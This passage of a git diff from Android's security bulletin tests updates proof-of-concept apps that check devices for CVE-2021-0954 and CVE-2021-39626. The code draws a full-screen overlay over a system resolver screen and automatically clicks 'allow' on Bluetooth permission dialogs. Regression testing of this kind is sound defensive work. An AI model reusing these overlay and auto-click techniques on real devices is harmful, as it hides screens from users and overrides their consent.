+ "SYSTEM_ALERT_WINDOW can overlay the %1$s screen</string>
+ <string name="mResumedTrue">mResumed=true</string>
+ <string name="messageKey">message</string>
+ <string name="overlayButtonText">OverlayButton</string>
+ <string name="overlayUiScreenError">Overlay UI did not appear on the screen</string>
+ <string name="resultKey">result</string>
+ <string name="sharedPreferences">CVE_2021_0954_prefs</string>
+ <string name="timedOutPocActivity">Timed out waiting on a result from PocActivity</string>
+ <string name="vulClass">com.android.internal.app.ResolverActivity</string>
+ <string name="vulClassAuto">com.android.car.activityresolver.CarResolverActivity</string>
+ <string name="vulPkg">android</string>
+ <string name="vulPkgAuto">com.android.car.activityresolver</string>
+ <string name="vulActivityNotRunningError">The %1$s is not currently running on the device
+ </string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/DeviceTest.java
index f98690625e9..9a94ef953c1 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/DeviceTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2021 The Android Open Source Project
+ * Copyright (C) 2022 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,17 +14,20 @@
* limitations under the License.
*/
-package android.security.cts.cve_2021_0954;
+package android.security.cts.CVE_2021_0954;
import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
-import static org.junit.Assert.assertNotNull;
-import static org.junit.Assert.assertNull;
+
+import static org.junit.Assert.assertTrue;
import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
-import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
+import android.content.SharedPreferences;
+import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
+import android.content.pm.PackageManager;
import android.provider.Settings;
import androidx.test.runner.AndroidJUnit4;
@@ -32,90 +35,107 @@ import androidx.test.uiautomator.By;
import androidx.test.uiautomator.UiDevice;
import androidx.test.uiautomator.Until;
-import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
-import java.io.IOException;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;
@RunWith(AndroidJUnit4.class)
public class DeviceTest {
- private static final String TEST_PKG = "android.security.cts.cve_2021_0954";
- private static final String TEST_VULNERABLE_PKG = "android";
- private static final String TEST_VULNERABLE_ACTIVITY =
- "com.android.internal.app.ResolverActivity";
- private static final int LAUNCH_TIMEOUT_MS = 20000;
- private static final String vulnerableActivityName = "ResolverActivity";
- private UiDevice mDevice;
- String activityDump = "";
-
- private void startOverlayService() {
- Context context = getApplicationContext();
- assertNotNull(context);
- Intent intent = new Intent(context, PocService.class);
- assertNotNull(intent);
-
- if (Settings.canDrawOverlays(getApplicationContext())) {
- context.startService(intent);
- } else {
- try {
- context.startService(intent);
- } catch (Exception e) {
- throw new RuntimeException("Unable to start the overlay service", e);
- }
- }
+ private Context mContext = getApplicationContext();
+ private static final int TIMEOUT_MS = 10000;
+
+ private boolean hasFeature(String feature) {
+ return mContext.getPackageManager().hasSystemFeature(feature);
}
- public void startVulnerableActivity() {
- Context context = getApplicationContext();
- Intent intent = new Intent();
- intent.setClassName(TEST_VULNERABLE_PKG, TEST_VULNERABLE_ACTIVITY);
- intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
- try {
- context.startActivity(intent);
- } catch (ActivityNotFoundException e) {
- assumeNoException("Activity not found on device", e);
- }
+ private boolean isAuto() {
+ return hasFeature(PackageManager.FEATURE_AUTOMOTIVE);
}
- @Before
- public void setUp() throws Exception {
- mDevice = UiDevice.getInstance(getInstrumentation());
+ String getStringRes(int key) {
+ return mContext.getResources().getString(key);
+ }
- /* Start the vulnerable activity */
- startVulnerableActivity();
- if (!mDevice.wait(Until.hasObject(By.res("android:id/contentPanel")
- .clazz("android.widget.ScrollView").pkg("android")), LAUNCH_TIMEOUT_MS)) {
- return;
- }
+ String getStringResWithArg(int key, String arg) {
+ return mContext.getResources().getString(key, arg);
+ }
- /* Start the overlay service */
- startOverlayService();
+ int getIntegerRes(int key) {
+ return mContext.getResources().getInteger(key);
}
@Test
- public void testVulnerableActivityPresence() {
- Pattern overlayTextPattern = Pattern.compile("OverlayButton", Pattern.CASE_INSENSITIVE);
- if (!mDevice.wait(Until.hasObject(By.text(overlayTextPattern)), LAUNCH_TIMEOUT_MS)) {
- return;
- }
-
- /*
- * Check if the currently running activity is the vulnerable activity, if not abort the test
- */
+ public void testOverlayButtonPresence() {
try {
- activityDump = mDevice.executeShellCommand("dumpsys activity");
- } catch (IOException e) {
- throw new RuntimeException("Could not execute dumpsys activity command");
- }
- Pattern activityPattern =
- Pattern.compile("mResumedActivity.*" + vulnerableActivityName + ".*\n");
- if (!activityPattern.matcher(activityDump).find()) {
- return;
+ UiDevice device = UiDevice.getInstance(getInstrumentation());
+
+ /* Start the overlay service */
+ assumeTrue(getStringRes(R.string.canNotDrawOverlaysMsg),
+ Settings.canDrawOverlays(mContext));
+ Intent intent = new Intent(mContext, PocService.class);
+ mContext.startService(intent);
+
+ /* Wait for a result from overlay service */
+ SharedPreferences sharedPrefs = mContext.getSharedPreferences(
+ getStringRes(R.string.sharedPreferences), Context.MODE_PRIVATE);
+ final Semaphore preferenceChanged = new Semaphore(0);
+ OnSharedPreferenceChangeListener listener = new OnSharedPreferenceChangeListener() {
+ @Override
+ public void onSharedPreferenceChanged(SharedPreferences sharedPreferences,
+ String key) {
+ if (key.equals(getStringRes(R.string.resultKey))) {
+ preferenceChanged.release();
+ }
+ }
+ };
+ sharedPrefs.registerOnSharedPreferenceChangeListener(listener);
+ assumeTrue(preferenceChanged.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ int result = sharedPrefs.getInt(getStringRes(R.string.resultKey),
+ getIntegerRes(R.integer.assumptionFailure));
+ String message = sharedPrefs.getString(getStringRes(R.string.messageKey),
+ getStringRes(R.string.defaultSemaphoreMsg));
+ assumeTrue(message, result != getIntegerRes(R.integer.assumptionFailure));
+
+ /* Wait for the UI of overlay window to appear */
+ Pattern overlayTextPattern = Pattern.compile(
+ mContext.getString(R.string.overlayButtonText), Pattern.CASE_INSENSITIVE);
+ assumeTrue(mContext.getString(R.string.overlayUiScreenError),
+ device.wait(Until.hasObject(By.text(overlayTextPattern)), TIMEOUT_MS));
+
+ /* Start the vulnerable activity */
+ intent = new Intent();
+ String vulActivity = getStringRes(R.string.vulClass);
+ String vulPkg = getStringRes(R.string.vulPkg);
+ if (isAuto()) {
+ vulActivity = getStringRes(R.string.vulClassAuto);
+ vulPkg = getStringRes(R.string.vulPkgAuto);
+ }
+ intent.setClassName(vulPkg, vulActivity);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ mContext.startActivity(intent);
+
+ /* Wait until the object of overlay window is gone */
+ boolean overlayDisallowed =
+ device.wait(Until.gone(By.pkg(mContext.getPackageName())), TIMEOUT_MS);
+
+ /*
+ * Check if the currently running activity is the vulnerable activity, if not abort the
+ * test
+ */
+ String activityDump = device.executeShellCommand(
+ getStringResWithArg(R.string.cmdDumpsysActivity, vulActivity));
+ Pattern activityPattern = Pattern.compile(getStringRes(R.string.mResumedTrue));
+ assumeTrue(getStringRes(R.string.vulActivityNotRunningError),
+ activityPattern.matcher(activityDump).find());
+
+ /* Failing the test as fix is not present */
+ assertTrue(getStringResWithArg(R.string.overlayErrorMessage, vulActivity),
+ overlayDisallowed);
+ } catch (Exception e) {
+ assumeNoException(e);
}
- String message = "Device is vulnerable to b/143559931 hence any app with "
- + "SYSTEM_ALERT_WINDOW can overlay the ResolverActivity screen";
- assertNull(message, mDevice.findObject(By.text(overlayTextPattern)));
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/PocService.java
index 82b78a2beba..79270baa65e 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/PocService.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/PocService.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2021 The Android Open Source Project
+ * Copyright (C) 2022 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,47 +14,65 @@
* limitations under the License.
*/
-package android.security.cts.cve_2021_0954;
+package android.security.cts.CVE_2021_0954;
import android.app.Service;
+import android.content.Context;
import android.content.Intent;
+import android.content.SharedPreferences;
import android.content.res.Resources;
import android.graphics.PixelFormat;
-import android.os.Handler;
import android.os.IBinder;
-import android.provider.Settings;
import android.view.Gravity;
import android.view.WindowManager;
import android.view.WindowManager.LayoutParams;
import android.widget.Button;
public class PocService extends Service {
- public static Button mButton;
- private WindowManager mWindowManager;
- private WindowManager.LayoutParams mLayoutParams;
+ Button mButton;
+ WindowManager mWindowManager;
- private static int getScreenWidth() {
+ private int getScreenWidth() {
return Resources.getSystem().getDisplayMetrics().widthPixels;
}
- private static int getScreenHeight() {
+ private int getScreenHeight() {
return Resources.getSystem().getDisplayMetrics().heightPixels;
}
+ String getStringRes(int key) {
+ return getResources().getString(key);
+ }
+
+ int getIntegerRes(int key) {
+ return getResources().getInteger(key);
+ }
+
@Override
public void onCreate() {
- super.onCreate();
- mWindowManager = getSystemService(WindowManager.class);
- mLayoutParams = new WindowManager.LayoutParams();
- mLayoutParams.type = WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY;
- mLayoutParams.flags = WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL
- | WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE;
- mLayoutParams.format = PixelFormat.OPAQUE;
- mLayoutParams.gravity = Gravity.LEFT | Gravity.TOP;
- mLayoutParams.width = getScreenWidth();
- mLayoutParams.height = getScreenHeight();
- mLayoutParams.x = getScreenWidth() / 2;
- mLayoutParams.y = getScreenHeight() / 2;
+ try {
+ super.onCreate();
+ mWindowManager = getSystemService(WindowManager.class);
+ LayoutParams layoutParams = new LayoutParams();
+ layoutParams.type = LayoutParams.TYPE_APPLICATION_OVERLAY;
+ layoutParams.flags =
+ LayoutParams.FLAG_NOT_TOUCH_MODAL | LayoutParams.FLAG_NOT_FOCUSABLE;
+ layoutParams.format = PixelFormat.OPAQUE;
+ layoutParams.gravity = Gravity.LEFT | Gravity.TOP;
+ layoutParams.width = getScreenWidth();
+ layoutParams.height = getScreenHeight();
+ layoutParams.x = getScreenWidth() / 2;
+ layoutParams.y = getScreenHeight() / 2;
+
+ /* Show the floating window */
+ mButton = new Button(this);
+ mButton.setText(getString(R.string.overlayButtonText));
+ mWindowManager.addView(mButton, layoutParams);
+ } catch (Exception e) {
+ sendTestResult(getIntegerRes(R.integer.assumptionFailure), e.getMessage());
+ return;
+ }
+ sendTestResult(getIntegerRes(R.integer.noAssumptionFailure), getStringRes(R.string.empty));
}
@Override
@@ -63,31 +81,27 @@ public class PocService extends Service {
}
@Override
- public int onStartCommand(Intent intent, int flags, int startId) {
- showFloatingWindow();
- return super.onStartCommand(intent, flags, startId);
- }
-
- @Override
public void onDestroy() {
- if (mWindowManager != null && mButton != null) {
- mWindowManager.removeView(mButton);
+ try {
+ if (mWindowManager != null && mButton != null) {
+ mWindowManager.removeView(mButton);
+ }
+ super.onDestroy();
+ } catch (Exception e) {
+ sendTestResult(getIntegerRes(R.integer.assumptionFailure), e.getMessage());
}
- super.onDestroy();
}
- private void showFloatingWindow() {
- if (Settings.canDrawOverlays(this)) {
- mButton = new Button(getApplicationContext());
- mButton.setText("OverlayButton");
- mWindowManager.addView(mButton, mLayoutParams);
- new Handler().postDelayed(new Runnable() {
- @Override
- public void run() {
- onDestroy();
- }
- }, 60000); // one minute
- mButton.setTag(mButton.getVisibility());
+ private void sendTestResult(int result, String message) {
+ try {
+ SharedPreferences sh = getSharedPreferences(getStringRes(R.string.sharedPreferences),
+ Context.MODE_PRIVATE);
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getStringRes(R.string.resultKey), result);
+ edit.putString(getStringRes(R.string.messageKey), message);
+ edit.commit();
+ } catch (Exception e) {
+ // ignore the exception
}
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/Android.bp
index d3e2302d280..2f87b9cdf31 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/Android.bp
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/Android.bp
@@ -30,10 +30,10 @@ android_test_helper_app {
test_suites: [
"sts",
],
- sdk_version: "current",
static_libs: [
"androidx.test.core",
"androidx.test.rules",
"androidx.test.uiautomator_uiautomator",
],
+ platform_apis: true,
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/AndroidManifest.xml
index f0978251006..74e263c53d4 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/AndroidManifest.xml
@@ -22,12 +22,8 @@
<uses-permission android:name="android.permission.BLUETOOTH"/>
<uses-permission android:name="android.permission.BLUETOOTH_CONNECT"/>
<uses-permission android:name="android.permission.BLUETOOTH_SCAN"/>
- <application
- android:testOnly="true"
- android:label="CVE-2021-39626"
- android:supportsRtl="true">
- <activity
- android:name=".PocActivity"
+ <application>
+ <activity android:name=".PocActivity"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
@@ -35,7 +31,6 @@
</intent-filter>
</activity>
</application>
-
<instrumentation
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.cts.CVE_2021_39626" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/integers.xml
new file mode 100644
index 00000000000..d5ae7443184
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/integers.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <integer name="assumptionFailure">-1</integer>
+ <integer name="pass">0</integer>
+ <integer name="enabled">1</integer>
+ <integer name="disabled">2</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/strings.xml
new file mode 100644
index 00000000000..e6f53e7ccc7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="allowButtonResName">android:id/button1</string>
+ <string name="btAction">btAction</string>
+ <string name="className">.Settings$ConnectedDeviceDashboardActivity</string>
+ <string name="defaultSemaphoreMsg">Could not get message key in shared preferences</string>
+ <string name="defaultSettingsPkg">com.android.settings</string>
+ <string name="failMessage">Vulnerable to b/194695497 !!</string>
+ <string name="messageKey">message</string>
+ <string name="resultKey">result</string>
+ <string name="sharedPreferences">CVE_2021_39626_prefs</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/DeviceTest.java
index cd245400fc9..6bb8d166080 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/DeviceTest.java
@@ -18,14 +18,15 @@ package android.security.cts.CVE_2021_39626;
import static org.junit.Assert.assertFalse;
import static org.junit.Assume.assumeNoException;
-import static org.junit.Assume.assumeNotNull;
import static org.junit.Assume.assumeTrue;
import android.bluetooth.BluetoothAdapter;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
-import android.content.pm.PackageManager;
+import android.content.SharedPreferences;
+import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
+import android.content.res.Resources;
import android.provider.Settings;
import androidx.test.InstrumentationRegistry;
@@ -34,69 +35,121 @@ import androidx.test.uiautomator.By;
import androidx.test.uiautomator.UiDevice;
import androidx.test.uiautomator.Until;
+import org.junit.After;
import org.junit.Test;
import org.junit.runner.RunWith;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
@RunWith(AndroidJUnit4.class)
public class DeviceTest {
- private static final int TIMEOUT = 5000;
- private static Context context;
+ static final int TIMEOUT = 10000;
+ boolean mBtState = false;
+ BluetoothAdapter mBtAdapter;
+ Context mContext;
+ OnSharedPreferenceChangeListener mListener;
+ Resources mResources;
+ SharedPreferences mSharedPrefs;
+ Semaphore mPreferenceChanged;
+ UiDevice mDevice;
- private static String getSettingsPkgName() {
+ private String getSettingsPkgName() {
Intent settingsIntent = new Intent(Settings.ACTION_SETTINGS);
ComponentName settingsComponent =
- settingsIntent.resolveActivity(context.getPackageManager());
+ settingsIntent.resolveActivity(mContext.getPackageManager());
String pkgName = settingsComponent != null ? settingsComponent.getPackageName()
- : "com.android.settings";
- assumeNotNull(pkgName);
+ : mContext.getString(R.string.defaultSettingsPkg);
return pkgName;
}
- private void openApplication(String applicationName) {
- Intent intent = context.getPackageManager().getLaunchIntentForPackage(applicationName);
- assumeNotNull(intent);
- intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ @After
+ public void tearDown() {
try {
- context.startActivity(intent);
+ // Disable bluetooth if it was OFF before the test
+ if (!mBtState) {
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(mContext.getString(R.string.btAction),
+ BluetoothAdapter.ACTION_REQUEST_DISABLE);
+ mContext.startActivity(intent);
+ }
+ mPreferenceChanged = new Semaphore(0);
+ mPreferenceChanged.tryAcquire(TIMEOUT, TimeUnit.MILLISECONDS);
+ int result = mSharedPrefs.getInt(mResources.getString(R.string.resultKey),
+ mResources.getInteger(R.integer.assumptionFailure));
+ String message = mSharedPrefs.getString(mResources.getString(R.string.messageKey),
+ mResources.getString(R.string.defaultSemaphoreMsg));
+
+ // Go to home screen
+ mDevice.pressHome();
} catch (Exception e) {
- assumeNoException(e);
+ // ignore the exception
}
}
@Test
public void testBtDiscoverable() {
- // Initialize UiDevice instance
- UiDevice device = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
- context = InstrumentationRegistry.getInstrumentation().getContext();
- BluetoothAdapter btAdapter = BluetoothAdapter.getDefaultAdapter();
- assumeNotNull(btAdapter);
-
- // Save the state of bluetooth adapter to reset after the test
- boolean btState = btAdapter.isEnabled();
- if (!btState) {
- // If bluetooth is disabled, enable it and wait for adapter startup to complete
- assumeTrue(btAdapter.enable());
- try {
- Thread.sleep(TIMEOUT);
- } catch (Exception e) {
- assumeNoException(e);
- }
- }
- assumeTrue(btAdapter.isEnabled());
+ try {
+ // Initialize UiDevice instance
+ mDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
+ mContext = InstrumentationRegistry.getInstrumentation().getContext();
+ mBtAdapter = BluetoothAdapter.getDefaultAdapter();
- // Launch the PoC application and ensure that it launches bluetooth settings
- openApplication(context.getPackageName());
- assumeTrue(device.wait(Until.hasObject(By.pkg(getSettingsPkgName())), TIMEOUT));
+ // Save the state of bluetooth adapter to reset after the test
+ mBtState = mBtAdapter.isEnabled();
- boolean isBtDiscoverable =
- (btAdapter.getScanMode() == btAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE);
+ // If bluetooth is disabled, enable it and wait for start activity to complete
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(mContext.getString(R.string.btAction),
+ BluetoothAdapter.ACTION_REQUEST_ENABLE);
+ mContext.startActivity(intent);
+ mResources = mContext.getResources();
- // Disable bluetooth if it was OFF before the test
- if (!btState) {
- btAdapter.disable();
- }
+ mSharedPrefs = mContext.getSharedPreferences(
+ mResources.getString(R.string.sharedPreferences), Context.MODE_APPEND);
+ mPreferenceChanged = new Semaphore(0);
+ mListener = new OnSharedPreferenceChangeListener() {
+ @Override
+ public void onSharedPreferenceChanged(SharedPreferences sharedPreferences,
+ String key) {
+ if (key.equals(mResources.getString(R.string.resultKey))) {
+ mPreferenceChanged.release();
+ }
+ }
+ };
+ mSharedPrefs.registerOnSharedPreferenceChangeListener(mListener);
+ mPreferenceChanged.tryAcquire(TIMEOUT, TimeUnit.MILLISECONDS);
- // The test fails if bluetooth is made discoverable through PoC
- assertFalse("Vulnerable to b/194695497 !!", isBtDiscoverable);
+ int result = mSharedPrefs.getInt(mResources.getString(R.string.resultKey),
+ mResources.getInteger(R.integer.assumptionFailure));
+ String message = mSharedPrefs.getString(mResources.getString(R.string.messageKey),
+ mResources.getString(R.string.defaultSemaphoreMsg));
+ assumeTrue(message, result != mResources.getInteger(R.integer.assumptionFailure));
+
+ // Checking if bluetooth is enabled. The test requires bluetooth to be enabled,
+ // assumption failing the test if it's not enabled
+ assumeTrue(mBtAdapter.isEnabled());
+
+ // Launch bluetooth settings which is supposed to set scan mode to
+ // SCAN_MODE_CONNECTABLE_DISCOVERABLE if vulnerability is active
+ intent = new Intent();
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String settingsPkg = getSettingsPkgName();
+ intent.setClassName(settingsPkg, settingsPkg + mContext.getString(R.string.className));
+ mContext.startActivity(intent);
+
+ assumeTrue(mDevice.wait(Until.hasObject(By.pkg(settingsPkg)), TIMEOUT));
+
+ boolean isBtDiscoverable = false;
+ isBtDiscoverable =
+ (mBtAdapter.getScanMode() == mBtAdapter.SCAN_MODE_CONNECTABLE_DISCOVERABLE);
+
+ // The test fails if bluetooth is made discoverable through PoC
+ assertFalse(mContext.getString(R.string.failMessage), isBtDiscoverable);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/PocActivity.java
index d4425ff0eb3..9a43cd19f31 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/PocActivity.java
@@ -16,24 +16,88 @@
package android.security.cts.CVE_2021_39626;
-import static org.junit.Assume.assumeNoException;
-
import android.app.Activity;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothManager;
+import android.content.Context;
import android.content.Intent;
+import android.content.SharedPreferences;
import android.os.Bundle;
-import android.provider.Settings;
+
+import androidx.annotation.IntegerRes;
+import androidx.test.InstrumentationRegistry;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
public class PocActivity extends Activity {
+ private static final int TIMEOUT = 5000;
+ private static final int REQUEST_ENABLE_BT = 1;
+ private static final int REQUEST_DISABLE_BT = 2;
+
+ int getInteger(@IntegerRes int resId) {
+ return getResources().getInteger(resId);
+ }
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
- Intent intent = new Intent();
- intent.setAction(Settings.ACTION_BLUETOOTH_SETTINGS);
try {
- startActivity(intent);
+ String action = getIntent().getStringExtra(getString(R.string.btAction));
+ UiDevice device = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation());
+ BluetoothManager bluetoothManager = getSystemService(BluetoothManager.class);
+ BluetoothAdapter bluetoothAdapter = bluetoothManager.getAdapter();
+ int code = REQUEST_ENABLE_BT;
+ if (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)) {
+ code = REQUEST_DISABLE_BT;
+ }
+
+ if ((action.equals(BluetoothAdapter.ACTION_REQUEST_ENABLE)
+ && !bluetoothAdapter.isEnabled())
+ || (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)
+ && bluetoothAdapter.isEnabled())) {
+ Intent enableBtIntent = new Intent(action);
+ startActivityForResult(enableBtIntent, code);
+
+ // Wait for the activity to appear and the allow button
+ device.wait(Until.hasObject(By.res(getString(R.string.allowButtonResName))),
+ TIMEOUT);
+
+ // Click on the allow button
+ UiObject2 object =
+ device.findObject(By.res(getString(R.string.allowButtonResName)));
+ object.click();
+ } else {
+ sendTestResult(getInteger(R.integer.pass), "");
+ finish();
+ return;
+ }
} catch (Exception e) {
- assumeNoException(e);
+ sendTestResult(getInteger(R.integer.assumptionFailure), e.getMessage());
+ return;
+ }
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+ if (requestCode == REQUEST_ENABLE_BT && resultCode == Activity.RESULT_OK) {
+ finish();
+ sendTestResult(getInteger(R.integer.enabled), "");
+ } else if (requestCode == REQUEST_DISABLE_BT && resultCode == Activity.RESULT_OK) {
+ finish();
+ sendTestResult(getInteger(R.integer.disabled), "");
+ }
+ }
+
+ private void sendTestResult(int result, String message) {
+ SharedPreferences sh =
+ getSharedPreferences(getString(R.string.sharedPreferences), Context.MODE_PRIVATE);
+ if (sh != null) {
+ SharedPreferences.Editor edit = sh.edit();
+ edit.putInt(getString(R.string.resultKey), result);
+ edit.putString(getString(R.string.messageKey), message);
+ edit.commit();
}
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/Android.bp
new file mode 100644
index 00000000000..044a5f5a161
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-39704",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/AndroidManifest.xml
new file mode 100644
index 00000000000..70b7a736be5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-39704/AndroidManifest.xml
@@ -0,0 +1,40 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2021_39704">
+ <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
+ <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
+ <application
+ android:supportsRtl="true">
+ <service
+ android:name=".PocService"
+ android:exported="true">
+ </service>
+ <activity
+ android:name=".PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
